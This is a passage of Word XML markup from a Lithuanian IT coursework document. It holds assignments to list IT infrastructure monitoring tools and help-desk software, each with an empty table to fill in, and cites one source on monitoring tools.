        <w:t>nkite</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>IT infrastruktūros pasiekiamumo sąvoką. Numaty</w:t>
      </w:r>
      <w:r w:rsidR="00BC2A77" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>kite</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> ir įvardin</w:t>
      </w:r>
      <w:r w:rsidR="00BC2A77" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>kite</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">kritinius infrastruktūros taškus, kurie </w:t>
      </w:r>
      <w:r w:rsidR="00BC2A77" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>veikia</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> IT infrastruktūros pasiekiamumą. Pateik</w:t>
      </w:r>
      <w:r w:rsidR="00BC2A77" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ite</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>programinių ar fizinių įrangų sąrašą, kurių paskirtis stebėti IT infrastruktūros pasiekiamumą. Užpildy</w:t>
      </w:r>
      <w:r w:rsidR="0038438E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">kite </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>lentelę:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="572"/>
        <w:gridCol w:w="2543"/>
        <w:gridCol w:w="2408"/>
        <w:gridCol w:w="2410"/>
        <w:gridCol w:w="1978"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="08453860" w14:textId="77777777" w:rsidTr="005D4796">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="288" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="12D880DF" w14:textId="7822658C" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="522B8DAE" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Eil.</w:t>
            </w:r>
            <w:r w:rsidR="004E40EE" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Nr.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1283" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="16D4B126" w14:textId="6EA56CFF" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="522B8DAE" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Įrangos pavadinimas: versija</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1215" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="789CB2E0" w14:textId="77777777" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="522B8DAE" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Pagrindiniai privalumai</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1216" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2E8744CB" w14:textId="77777777" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="522B8DAE" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Pagrindiniai trūkumai</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="998" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1666FEAF" w14:textId="77777777" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="522B8DAE" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Namų puslapio adresas</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="3891DF7B" w14:textId="77777777" w:rsidTr="005D4796">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="288" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="62906236" w14:textId="77777777" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="522B8DAE" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>1.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1283" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="58149951" w14:textId="77777777" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="00C808AA" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1215" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="294AA141" w14:textId="77777777" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="00C808AA" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1216" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="2F18F283" w14:textId="77777777" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="00C808AA" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="998" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6B1C5265" w14:textId="77777777" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="00C808AA" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="4203DEF6" w14:textId="77777777" w:rsidTr="005D4796">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="288" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="4F375603" w14:textId="77777777" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="522B8DAE" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>2.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1283" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="18EB9340" w14:textId="77777777" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="00C808AA" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1215" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="207CAFC8" w14:textId="77777777" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="00C808AA" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1216" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6A70419A" w14:textId="77777777" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="00C808AA" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="998" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6F91A8C1" w14:textId="77777777" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="00C808AA" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C808AA" w:rsidRPr="005A5C28" w14:paraId="597F4DF2" w14:textId="77777777" w:rsidTr="005D4796">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="288" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="298D5E1B" w14:textId="77777777" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="522B8DAE" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>..</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1283" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="2F600A60" w14:textId="77777777" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="00C808AA" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1215" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="127AD32E" w14:textId="77777777" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="00C808AA" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1216" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="0D043812" w14:textId="77777777" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="00C808AA" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="998" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="75E7D264" w14:textId="77777777" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="00C808AA" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="03DE346E" w14:textId="77777777" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="00C808AA" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E8E0892" w14:textId="77777777" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="522B8DAE" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Papildomi informacijos šaltiniai:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EBB41D" w14:textId="77777777" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="522B8DAE" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>List Of 11 Best Open Source &amp; Free Monitoring Tools (2020, rugpjūčio 21). D</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>evopscube</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId131">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://devopscube.com/best-opensource-monitoring-tools/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="526985BD" w14:textId="7D6A8985" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="00C808AA" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04AA9E77" w14:textId="2EB330A5" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="003D0977" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="522B8DAE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> užduotis. </w:t>
      </w:r>
      <w:r w:rsidR="522B8DAE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">PAGALBOS STALAS (ANGL. </w:t>
      </w:r>
      <w:r w:rsidR="006E686E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="522B8DAE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>HELP DESK)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208DEF4F" w14:textId="77777777" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="522B8DAE"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UŽDUOTIES SĄLYGA: Sudarykite 5 HELP DESK programinių įrangų sąrašą. Vieną iš programinių įrangų išbandykite. Užpildykite lentelę:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1067"/>
        <w:gridCol w:w="2571"/>
        <w:gridCol w:w="3530"/>
        <w:gridCol w:w="2743"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="356EDCFE" w14:textId="77777777" w:rsidTr="00621B4B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="538" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="00226665" w14:textId="0A6D8D9A" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="522B8DAE" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Eil.</w:t>
            </w:r>
            <w:r w:rsidR="000C043E" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Nr.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1297" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="42BEE91D" w14:textId="5029529C" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="522B8DAE" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Programinės įrangos pavadinimas: versija / namų puslapio adresas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1781" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3101CEC3" w14:textId="77777777" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="522B8DAE" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
